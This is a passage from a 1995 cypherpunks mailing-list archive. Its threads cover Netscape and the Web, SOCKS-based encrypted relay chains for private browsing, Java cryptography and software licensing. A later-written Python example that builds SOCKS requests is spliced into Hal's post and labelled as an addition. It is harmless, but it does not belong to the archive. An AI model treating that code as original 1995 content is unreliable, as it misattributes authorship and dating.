>
>In article <ac33f977080210043230@[205.199.118.202]>, tcmay@sensemedia.net
>(Timothy C. May) wrote:
>
>>Frankly, one of the great boons of my current setup is that I can
>>completely get away from Unix tools and commands, away from my Unix shell
>>account at Netcom, away from the arcane commands that vary from program to
>>program, away from tin and elm and emacs...my fingers are already
>>forgetting the emacs commands!
>>
>>(Those of you like Unix, fine. I agree it is useful for many things, so I'm
>>not trying to debate Unix vs. the world. Just giving my perspective, and
>>apparently the perspective of the many who are adopting the Web browsers as
>>their "operating environments," insulated from the underlying cruft.)
>
>Is this the same T.C. May that used to argue vehemently that if it can't
>be displayed on a VT52, it was no good? Did a space alien take over Tim?

If you read my messages of last December, you'll see I said this on 15
December 1994:


"I see two "stable attractors" for text/graphics/multimedia/etc. sent
over the Net:

"1. Straight text, ASCII, 80 column format. All systems can handle
this, all mailers and newsreaders can handle it, it's what the Usenet
is essentially based upon, and it gets the job done. It meets the
needs of 95% of us for 95% of our needs.

"2. The Web, for graphics, images, etc. This will be the next main
stable attractor, deployed on many platforms. (I'm assuming the debate
here about Netscape standards does not imply much of a fragmentation,
that Mosaic, Netscape, MacWeb, etc., will all basically be able to
display Web pages in much the same way.)"



I'd say this is very consistent with what I've been saying recently.

--Tim May


..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:30:30 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <ac35228910021004fd83@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:54 AM 7/21/95, Robert Hettinga wrote:

>Tell us about it in 6 months, Tim, when you've grown out of Netscape. You
>sound like someone who's totally enamored with their "-works" app. Most
>people end up using more specialized apps when they hit the wall with
>something which won't get all those "general purposes" taken care of...

No, I don't use any of the "-works" apps, and I think the success of the
Web speaks for itself...this is not a view I have just come to, as my
recent message shows.

And I'm not wedded to "Netscape" per se, though that particular environment
has the current momentum. I've also used Mosaic and MacWeb to do much the
same things, but find Netscape smoother.

Out of curiosity, the phrase "grown out of Netscape," aside from the
implied barb, means what? Just what am I missing and what do I need to
"grow out of"?

If, perchance, this is just one of those throwaway barbs, implying I move
from fad to fad (as Fraering's post implied), you should know that I stuck
with tin/elm/emacs/eudora for more than 3 years, as nothing obviously
better--and worth the learning curve to switch to--had come along. (In the
Mac domain I used other programs, none of them "-works" packages.)

But, I'll tell you what, I *will* tell you about it in 6 months, whether or
not I've grown out of Netscape!

--Tim May



..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Fri, 21 Jul 95 06:30:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507211330.AA26670@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


TC May writes:
> Frankly, one of the great boons of my current setup is that I can
> completely get away from Unix tools and commands [...]
>...my fingers are already forgetting the emacs commands!

If I forget thee, O Emacs, let my right hand forget her cunning. 
If I do not remember thee, let my tongue cleave to the roof of my 
mouth; if I prefer not Emacs above my chief joy. 

(with apologies to the psalmist)

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 09:50:08 PDT
To: "Robert A. Rosenberg" <cypherpunks@toad.com
Subject: RE: Netscape the Big Win
Message-ID: <ac35286d130210045fc1@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:45 AM 7/21/95, Robert A. Rosenberg wrote:
>At 10:39 7/20/95, Timothy C. May wrote:
>>To state an obvious non-crypto use of such "modules," why do all major word
>>processing and page layout apps have their own "dictionaries"? Why do I
>>have to train the dictionaries of Word, Nisus, FrameMaker, MORE, etc.? That
>>there have not been "dictionary modules," for many and sundry reasons, is
>>telling. (Before anyone mentions it, one can on the Mac use things like
>>"Thunder" instead of the local dictionaries...this is not the same as a
>>module usable by all programs, but instead is a user choice to bypass the
>>local dictionaries. We could quibble for hours about whether this is in
>>fact a universal module or not.
>
>
>Since the support that Thunder 7 provides (with Wordprocessing and
>Wordprocessing-Like Programs that it supports) is indistinguishable from
>that provided by each program's integrated SpellChecker (along with T7
>providing a common set of "extra" User-Extendable Dictionaries as well as a
>Glossary/Mis-Spelling/Words-to-Replace Dictionary [ie: Pre-Prime the list
>of incorrectly spelled words for "Replace All" so the user's personal
>misspellings are automatically corrected without any interaction on his/her
>part]), I think the ball is initially in the court of those who claim it is
>not a universal module (admittedly only for those WPs it supports) to
>explain why it does not function as one would function if it existed.

Yes, I was the one who mentioned "Thunder." Should I justify why it is "not
a universal module"? I won't waste our time.

The essence, though, of having "parts" is that the suppliers of _other_
programs would not then have to supply the overlapping functions. In the
case of Thunder, it may be useful and all (which is what I said when I
mentioned it), but it's sufficiently obscure/unavailable that the makers of
my various word processing programs and page preparation programs supply
their own (and incompatible) dictionaries. This was my point.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 21 Jul 95 07:13:46 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape the Big Win
Message-ID: <9507211413.AA25887@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Well, X.509 for now. The Eastlake-Kaufman DNS Security work
> (draft-ietf-dnssec-secext-04.txt) plus MOSS (draft-ietf-pem-mime-08.txt
> --now proposed standard, awaiting an RFC number) promise to give us
> a non-X.509 certification structure for the Internet.

I have serious concerns about whether the DNS stuff will really scale.
It's gonna blow out DNS server memory use, and the bigger packets mean
a *lot* more TCP (vs UDP) activity.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 21 Jul 95 10:15:14 PDT
To: cypherpunks@toad.com
Subject: Re: It had to happen...
In-Reply-To: <9507210931.AA29736@snark.imsi.com>
Message-ID: <199507211714.KAA19175@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> "Perry E. Metzger" <perry@imsi.com> writes:
> They [NSA] also have a Fortezza based web security system. One of their guys
> was discussing some of that here at IETF.

Are their Fortezza keys escrowed, or is this a "special run" of the chips
without escrow?

	Jim Gillogly
	Sterday, 28 Afterlithe S.R. 1995, 17:14




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 21 Jul 95 10:20:26 PDT
To: cypherpunks@toad.com
Subject: Re: Cyberporn on NPR today - 2pm EDT / 11am PDT
Message-ID: <199507211718.KAA02958@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:04 AM 7/21/95 EDT, Rich Lethin wrote:
>
>Talk of the Nation on NPR is having a call-in program this afternoon
>on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
>Crypto-relevance... 4 horsepeople... 

TotN is on at 2:00 Eastern Time, 11:00 Pacific
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 21 Jul 95 10:21:32 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape the Big Win
Message-ID: <v01520d02ac359f28a3e1@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:45 7/21/95, Ray Cromwell wrote:
>> >   The answer is: integration. While TRN is a great newsreader, and
>> >Eudora's a great mail reader, etc, if I read a post in TRN or a message
>> >in Eudora, there is no hyperlinking. If I see a link or reference,
>>
>> If you used a Mac, all you had to do is click on the URL in your mailer,
>> newsreader, even some text editors, and the correct helper application will
>> open the URL.
>
>  Yeah, but does it fire up 1 browser process every time you click on it, or
>will it command an already running browser to follow the link?

If the helper app is not running it will start it, if it is running it will
pass the URL to the already running app. Note that it doesn't have to be a
browser. You can - and usually will - use separate apps for different types
of URLs.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 21 Jul 95 10:28:50 PDT
To: enzo@ima.net
Subject: Re: Netscape the Big Win
Message-ID: <199507211727.KAA06527@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Enzo Michelangeli <enzo@ima.net>
> On Thu, 20 Jul 1995, Hal wrote:
> > That is why I am working on the proxy approach.  Any browser should be
> > able to use enhancements supplied in this way.  Netscape is the big name
> > this year, who knows who it will be next year.  As long as IP
> > connectivity is available a proxy can get into the stream and apply
> > enhancements.
> 
> I still maintain that an approach based on SOCKS would be more flexible, 
> adaptable to any TCP-based application. Here's what I'm thinking about:

I agree with this general approach, but I looked into it in some detail,
and SOCKS has a fatal flaw for my purposes: the address to connect to is
passed as an IP 32-bit address.  That means the software on the PC
has to do the DNS lookup.  And *that* means that the ultimate site being
connected to is revealed.

One of my goals is to protect the secrecy of the sites that a person is
browsing.  If an in-the-clear DNS lookup is done for each site that will
hardly be effective, even if the actual connection request is encrypted.
An eavesdropper on the internet will be able to observe the DNS lookup
traffic.

Now SOCKS V5 is going to change this; it allows the proxy to receive the
request as a hostname rather than an IP address.  So no DNS lookup is
necessary by the client.  Conceivably a modified winsock such as Enzo is
suggesting could use that protocol, although it is not really stable
yet.

Also, I don't know how easy it is to intercept winsock calls and modify
them in this way.  So the proxy I have written works using the HTML proxy
hook rather than the SOCKS hook.

> 1. Windows apps: a general purpose socksifier, intercepting Winsock API
> calls by *unmodified* applications and opening a single TCP connection to 
> the port 1080 of a sockd server. The good news is: some good folks at NEC 
> are already working at this project, and are looking for beta-testers.

This sounds very good if it already is almost working.  The TCP
connection which is opened would have to be to a server on the local
machine, so it would be important that the software support that.  Also,
the local SOCKS relay would of course not want its winsock calls to be
intercepted and translated in this way, so there would need to be some
alternative way to access "vanilla" winsock.  Can you give any
more information on the NEC work?

> 2. A "SOCKS en/decrypting relay": a sockd server that, on a 
> per-site/per-port basis depending on a configuration file, may either 
>  a) open TCP connections on behalf of its clients; 
>  b) relay a plain SOCKS connection to a remote peer;
>  c) open a SSL connection to a remote peer on, say, a port 1180 reserved
>     for "SSL-ized SOCKS" connections)
> Of course, that beast should also listen at the ports 1080 and 1180 and 
> take the same actions a) b) or c) as appropriate.

For chaining purposes you would connect to the relay on the net on the
secure port and request a TCP connection (not a SOCKS connection) to
the second relay in the chain at its secure port.  Then you negotiate a
secure connection from your home PC to that second relay so that the
traffic you send to it won't be visible to the first relay.  Once that
is done you send a SOCKS request to that second relay to connect to the
next machine in the chain.  So really only function (a) is needed for
the relays on the net.

The relay on the PC needs to be able to do (c), but more importantly it
needs to be able to set up encryption chains, where every outgoing packet
is nestedly encrypted, with the outermost encryption for the first relay
in the chain, the next layer for the next relay, and so on.  Each relay
decrypts and strips off one layer, then passes the remaining raw data
through.  This way no one relay knows who is talking to whom or what they
are saying.  The reverse happens for return packets.

> The SOCKS en/decrypting relay could be written both as MS-Windows DLL and as 
> UNIX daemon.

I have written a simple dummy relay for winsock and it requires a pretty
different programming style than for Unix.  Netscape has a habit of
firing off a bunch of requests at once, so it has to be extremely
asynchronous.  For Windows this means you get a windows message every
time a packet arrives and use non-blocking I/O.  In Unix this is usually
handled by forking a new process to handle each independent connection.
Non-blocking I/O can be used in Unix but I don't think there is a
non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
a more Unix-style communication model, though.  Should the proxy require
Windows 95, or will Windows 3 still be in widespread use for another
year or two?

Also IMO the requirements for the Internet relay are pretty different
than for the Windows relay.  The Internet relay needs only to be able to
decrypt/encrypt on the port where the request comes from while sending
plain data the other way.  It needs a config file so the owner can
control what kinds of outgoing TCP connections can be done.  The Windows
one needs to be able to do nested encryption (if chains will be allowed
eventually), to set up chains, etc.  So for these reasons I am inclined
to think that the two relays would be separate programs.

> The chain would be:
> 
> - From a Windows client machine:
> 
>  Standard app -> Socksifier DLL by NEC -> encrypting relay -----> 
>   ---> Internet -----> decrypting relay -> server
> 
> - From a Unix client machine:
> 
>  Socksified (recompiled) app -> encrypting relay ------>
>   ---> Internet -----> decrypting relay -> server
> 
> I'm assuming here that the encrypting relay should live close to machine
> (the same, or, at least on the same network) as the client app, and the
> decrypting relay close to the server. A single daemon could do both jobs, 
> allowing chaining "a` la remailer", but I'm using here two different 
> names for sake of clarity. Besides, the Windows version probably wouldn't 
> need decrypting ability.

The Windows version would need to decrypt incoming data; you don't want
that coming in the clear.

> Great advantage over Netscape: we could use EAY's free SSL implementation,
> and all the server administrators could generate and sign their own
> certificates. The present trouble with Netscape is that NS-Navigator
> refuses to accept certificates not signed as "Netscape compatible". Our
> en/decrypting relay could be more forgiving :-)

The other problem with Netscape SSL is that it will only open secure
connections to URL's marked "https://".  Similarly SHTTP has a special
URL "shttp://".  There is no provision in either one to open a secure
connection to "http://".  A relay proxy would allow all connections to be
encrypted between the PC and one or more relays.

I am a little unclear on the certificate situation.  As we saw with the
PGP key servers before RSAREF PGP existed, RSA put pressure on these
public sites which they saw as contributing to the use of infringing
software.  Similarly having a certificate created by infringing software
might be seen as illegal, even if RSAREF was actually used for the
handshaking in the protocol.  Server operators are quite vulnerable to
threatening letters from RSA.

Another problem with RSAREF is that it does not allow you to exchange a
session key using RSA encryption in a straightforward manner.  The entry
points you have legal access to choose a random session key, PK encrypt
it, send it, and then encrypt the message using that session key with DES
or 3DES.  However I notice that SSLREF calls undocumented entry points
like RSAPrivateDecrypt and RSAPublicEncrypt.  I am not sure how they are
able to do this.  Maybe they got special permission from RSA.  I don't
know whether the SSLEAY library would be able to do this without such
special arrangements.

> As the SSL stuff built in
> Netscape would be unused, we could also improve the protocol (plugging
> security holes) ignoring compatibility issues.

Yes, really there is no need to make it be SSL specifically except for
the fact that it is an explicit protocol for which libraries exist.

> The administrators of
> secure servers should just advise the users to configure their local
> encrypting relays to pass through their decrypting relay (that would boil
> down to a line added to the encrypting relay configuration). 

> It would all be beautifully modular, relatively simple to code (as someone
> else has done, or is doing, most of the hard work) and independent from
> big-brother certifying authorities. 

Yes, I think the overall approach is very promising.  Perhaps my desire
for chaining is too ambitious for a first attempt.  The transparent
intervention of SOCKS that you describe would be very nice if that is
available soon.

One other problem is the risk taken by people running the relay servers
on the net.  These could be used to launder connections by hacker /
cracker types.  So probably only a limited set of outgoing ports would be
permitted, say, 80 and 1080 which are the most common http ports.  This
would restrict the utility of the SOCKS approach for other uses like
secure telnet, unfortunately.

Hal
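
The addressing difference Hal describes, as an added example that is not part of his post or of any SOCKS implementation: it builds a SOCKS4 CONNECT request and a SOCKS5 request (field layout as later published in RFC 1928, method negotiation omitted) and records which hostnames the client had to resolve itself. Function names, the sample hostname and the sample DNS table are constructed for illustration.

```python
import ipaddress
import struct

CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04

# Constructed stand-in for the client's DNS resolver, so the example runs offline.
SAMPLE_DNS = {"www.example.com": "192.0.2.10"}


def _check_port(port: int) -> int:
    if not 0 < port < 65536:
        raise ValueError("port out of range")
    return port


def socks4_connect(dst_ip: str, port: int, userid: bytes = b"") -> bytes:
    """SOCKS4 CONNECT: VN, CD, DSTPORT, DSTIP (32 bits), USERID, NUL."""
    addr = ipaddress.IPv4Address(dst_ip)  # raises ValueError for a hostname
    head = struct.pack("!BBH4s", 4, CMD_CONNECT, _check_port(port), addr.packed)
    return head + userid + b"\x00"


def socks5_connect(host: str, port: int) -> bytes:
    """SOCKS5 request: VER, CMD, RSV, ATYP, DST.ADDR, DST.PORT."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("ascii")
        if not 1 <= len(name) <= 255:
            raise ValueError("hostname must be 1..255 bytes")
        body = bytes([ATYP_DOMAIN, len(name)]) + name  # name travels to the relay
    else:
        atyp = ATYP_IPV4 if addr.version == 4 else ATYP_IPV6
        body = bytes([atyp]) + addr.packed
    return bytes([5, CMD_CONNECT, 0]) + body + struct.pack("!H", _check_port(port))


def build_request(version: int, host: str, port: int, resolve):
    """Return (request bytes, hostnames the client had to look up locally)."""
    local_lookups = []
    if version == 4:
        try:
            ipaddress.IPv4Address(host)
            ip = host
        except ValueError:
            local_lookups.append(host)  # this query leaves the client in the clear
            ip = resolve(host)
        return socks4_connect(ip, port), local_lookups
    return socks5_connect(host, port), local_lookups


def parse_request(data: bytes) -> dict:
    """Decode a request as the relay receiving it would."""
    if not data:
        raise ValueError("empty request")
    if data[0] == 4:
        end = data.find(b"\x00", 8)
        if len(data) < 9 or end == -1:
            raise ValueError("truncated SOCKS4 request")
        _, _, port, raw = struct.unpack("!BBH4s", data[:8])
        return {"version": 4, "dst": str(ipaddress.IPv4Address(raw)),
                "port": port, "proxy_resolves": False}
    if data[0] != 5 or len(data) < 5:
        raise ValueError("unsupported or truncated request")
    atyp = data[3]
    if atyp == ATYP_DOMAIN:
        start, alen = 5, data[4]
    elif atyp in (ATYP_IPV4, ATYP_IPV6):
        start, alen = 4, (4 if atyp == ATYP_IPV4 else 16)
    else:
        raise ValueError("unknown address type")
    if len(data) < start + alen + 2:
        raise ValueError("truncated SOCKS5 request")
    raw = data[start:start + alen]
    (port,) = struct.unpack("!H", data[start + alen:start + alen + 2])
    dst = raw.decode("ascii") if atyp == ATYP_DOMAIN else str(ipaddress.ip_address(raw))
    return {"version": 5, "dst": dst, "port": port,
            "proxy_resolves": atyp == ATYP_DOMAIN}


if __name__ == "__main__":
    for version in (4, 5):
        req, lookups = build_request(version, "www.example.com", 80,
                                     SAMPLE_DNS.__getitem__)
        print(version, req.hex(), "client-side DNS lookups:", lookups,
              parse_request(req))
```

With SOCKS4 the hostname shows up in the client's own lookup list; with the SOCKS5 domain address type that list stays empty and the name appears only inside the request sent to the relay.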




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Fri, 21 Jul 95 09:51:46 PDT
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: "Cypherpunks Write Code" as a Putdown
In-Reply-To: <9507210900.AA25179@snark.imsi.com>
Message-ID: <Pine.3.89.9507211043.B11679-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Perry E. Metzger wrote:

> sure that the IETF meeting in Dallas in a few months will have IPSP

When and where will this be in Dallas?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bostic@CS.Berkeley.EDU (Keith Bostic)
Date: Fri, 21 Jul 95 08:05:21 PDT
To: stripes@va.pubnix.com
Subject: Plan9 press release followup
Message-ID: <199507211504.LAA21881@python.bostic.com>
MIME-Version: 1.0
Content-Type: text/plain


It's been pointed out to me that the recent Plan 9 article does
not match the licensing agreement.  Nobody has any idea why the
speaker didn't understand that the software community is likely
to react badly to the phrase "any changes they make will become
AT&T's property", but there is a rumor that they *may* have been
a lawyer.  ;-}

As I understand it, the license is roughly as follows:

    + For $350, you get copies of the complete source and binaries
      for Plan 9.  You can make this copy available internally to your
      company, i.e. NFS is okay as long as it's not on the Internet.
    + You agree to not resell it or provide a product or service based
      on it without reaching an agreement with AT&T first.
    + You agree that if you create a derivative work, you will license
      it to AT&T on a royalty-free basis.  (I'm also told that some of
      the wording means that hardware specific things are excluded).

There's nothing about modifications becoming the property of AT&T.

The license is on the Web at http://plan9.att.com/plan9/shrink.html.

--keith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 21 Jul 95 08:05:11 PDT
To: cypherpunks@toad.com
Subject: Cyberporn on NPR today
Message-ID: <9507211504.AA22710@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



Talk of the Nation on NPR is having a call-in program this afternoon
on the "pervasiveness of cyberporn".  I think it's 1:00 or 2:00.
Crypto-relevance... 4 horsepeople... 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 21 Jul 95 07:37:14 PDT
To: pgf@tyrell.net (Phil Fraering)
Subject: Re: And another thing...
In-Reply-To: <199507202233.AA15359@tyrell.net>
Message-ID: <m0sZJsw-0009tNC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> As usual, one final question came to mind right after
> sending the last message:
> 
> Why is Java the next hot thing instead of Telescript?
> 
> Was Telescript ever opened up for general use or was it
> mainly used for AT&T's Personalink network?
> 
> Phil


Unless I'm mistaken, Telescript was part of General Magic's technology.
Besides the language deficiencies, IMHO, they would release almost
nothing to the general developers, much less a sample implementation
to be ported.  It's almost impossible to develop for: you need a souped
up Mac, a developer PDA, etc...

(I'm talking about Magic Cap (the OS) development in which I think the
language was called Telescript.)

Compared to a powerful Unix development environment (if and when it gets
ported to Linux, HPUX, or SGI that I use... (no longer in a Sun shop)),
it really seems awful.  It was also very buggy as late as mid last
year.

OTOH, I wrote a piece of software that interprets the raw async data from
satellite and chops it into articles.  (Reuters special feed for Magic
Cap clients...)

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 21 Jul 95 11:26:32 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <v02120d0cac35a6940b17@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>So, what would be a "cypherpunk" thing you could do with Java?  I know
>I can use it to download little applets to my system to do animations.
>What can it do to enhance my privacy?  What would be the Java equivalent
>of PGP?
>

Portable PGP with a GUI interface that didn't suck?

Note that I'm championing the use of Java as a portable language,
with a portable windowing toolkit, that will (real soon now) have
commercial tool support from a variety of vendors, as well as free
tools available on the net (the best of both worlds.)

The whole issue of how to do cryptography with applets is kind of
complicated, and is something Amanda and I have been working on very
diligently. The hard part is determining what the interface is
between trusted code (that you have installed on your machine, or
ultimately, that you've specifically designated as being trusted
based on secure hash) and untrusted code that comes from random
web sites on the net.

In general, for any general-purpose cryptography tool, you're going
to want almost all of it to be based on locally-installed, trusted
code. Certain protocols can actually work much better using applets,
but they should only be allowed to access a very narrow set of local
routines that directly interface with the user. (e.g. "Do you really want
to sign this?", "Confirmed signed by so-and-so.", etc.)

This is, however, a separate issue from the use of Java to do
standalone applications.

See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Fri, 21 Jul 95 09:38:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Something occured to me
Message-ID: <Pine.ULT.3.91.950721113352.5103A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

About two weeks ago, there was some talk in here with regards to holding 
DC lawmakers criminally liable for passing bad laws.  This was followed 
up with postings pointing out that you can't do that.

However, this morning I remembered something.

When the republicans took over the congress, they instituted that 
Contract on America.   One of the first laws that was passed (by both 
parties, I might add) was a law that made lawmakers abide by the same 
laws that "normal" people abide by.

Does this change, in any fashion, the original idea?

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMA+76DokqlyVGmCFAQEmdgQAsM6fAjnwWMDqCIHQG2HGp6ECY3ITexxr
N8HFSTZUN7C34fPhAkTmUgalSKbv15Pcca8QXTutXTxhBAXsbTn8rCuQNhdjzigN
pXl77a/KRkQqkMCED9DoRkemD3Pt4zPAtQDJbcHmSfokovUSr0q0cFZF8aveCmAB
hEyRQEIFgAo=
=Ha4N
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Fri, 21 Jul 95 11:36:05 PDT
To: cypherpunks@toad.com
Subject: "Where is the Market?"
Message-ID: <ac352cdc150210046a6c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I want to elaborate on the words from last December that I just posted, in
response to some comments about how I had just "discovered" the Web.

L. McCarthy just had some good points about differing privacy/political
goals here on this list.

When we first formed, almost three years ago, one of the first things we
did at a physical meeting--and the issue was echoed on the new mailing
list--was to conduct a poll of who was using what mail tools, e.g., pine,
elm, emacs, Microsoft Mail, MCI Mail (?), Lotus Notes, Eudora, etc. The
results--which should be in the archives for sometime around
November-December 1992--were, as expected, all over the map. No clear
winner. The reason for the poll was obvious: to determine what sort of
target markets the various PGP integrators would have.

Even then, there were religious wars, with, for example, the emacs crowd
arguing that PGP should be integrated into emacs and then the world could
just switch to emacs (as they should have long before :-)).

Now I wish I could draw pictures here---and that I can't draw pictures here
and still communicate with most of you here makes an interesting point
about the still-dominant nature of ASCII, which ain't about to change
anytime soon for lists like this---so I could better explain my "stable
attractors" line of reasoning. But I'll do it instead with more words.


Here's an elaboration on my points made last December 15:


"I see two "stable attractors" for text/graphics/multimedia/etc. sent
over the Net:"

What I mean by "stable attractors" are the "islands" or regions in product
space that have solidity and success. Leading commercial products are
obvious examples, with a cloud of related or ancillary products supporting
them. Product versions are like a chain of these islands.

As with "attractors" in general (and I assume everyone on this list has
read much about attractors, usually in the context of strange attractors),
there are not many "occupied" regions in the nether-realm between
attractors. That is, between the islands lies open water. "Survival" is
difficult in these open waters.

My main model for software, borne out by everything I see, is that this
"island colonization" model is appropriate.


"1. Straight text, ASCII, 80 column format. All systems can handle
this, all mailers and newsreaders can handle it, it's what the Usenet
is essentially based upon, and it gets the job done. It meets the
needs of 95% of us for 95% of our needs."

By this I mean just what this list is doing _now_. ASCII is the de facto
lingua franca. People with PCs, various operating systems on their PCs
(DOS, Win3.1, Win95beta, Linux, OS/2, NeXTStep, Solaris, etc.),
Macintoshes, terminals, Amigas, Ataris, Suns, SGIs, NeXTs, and so on, are
all mostly able to read what is distributed here.

Deviations occur, but mostly unintentionally or as "experiments."
Occasionally people will still try to send NeXT-formatted mail--I forget
what it was called--and various people send their messages as
"attachments," even when the text is apparently just straight ASCII.

(Hint to the attachment-senders: I periodically go into the "Attachments"
folder on my system and empty it of the unread big and little attachments
that have accumulated in it...others have said they do the same. So, if
your message will fit into the standard text/ASCII "primary format" of the
Cypherpunks list, that is how you should send it...and if it _isn't_
straight text, but instead includes attached spreadsheets, JPEG movies of
the Waco raid, etc., you might ask yourself just how many people will
bother to read or view your message?)

Hence my comment that "the written word" is a massively stable, heavily
colonized "island" or "attractor." It can be handled in foreign languages,
with some difficulty, and on nearly any computer system in the world. It is
the language of legal briefs, of economic reports, of crop reports, and of
a zillion other forms of communication. Pure text is powerful stuff.

But what about pictures, illustrations, diagrams? Magazines and books use
them widely, so why can't we? And what about styled text, footnotes,
superscripts, hypertext links, etc.?

Well, in a different world we might have adopted standards earlier than we
did and such things might be more common and acceptable today.

(For those who will argue that it is "possible" to exchange e-mail with
embedded diagrams, equations, footnotes, etc., "sure."  But ask yourself
how many times you have ever actually _done_ this, with friends and e-mail
correspondents? Some who have done this point out that it usually involved
folks within corporations who can standardize on the tools and default
settings to make this transparent...then they can send richly-formatted
stuff without excessive work. And how many other mailing lists, besides
Cypherpunks, have such embedded diagrams and illustrations? I'm not talking
about the Web here--I'll get to it in my next point--but about what this
list is and what NetNews, for example, is.)

What will "the masses" likely use to implement a richer communications
channel, one that encompasses pictures, illustrations, movies, spreadsheets,
etc.? What will be the _next_ big island people colonize? (Which is of
obvious interest for the deployment of crypto to users.)

From Dec. 15:


"2. The Web, for graphics, images, etc. This will be the next main
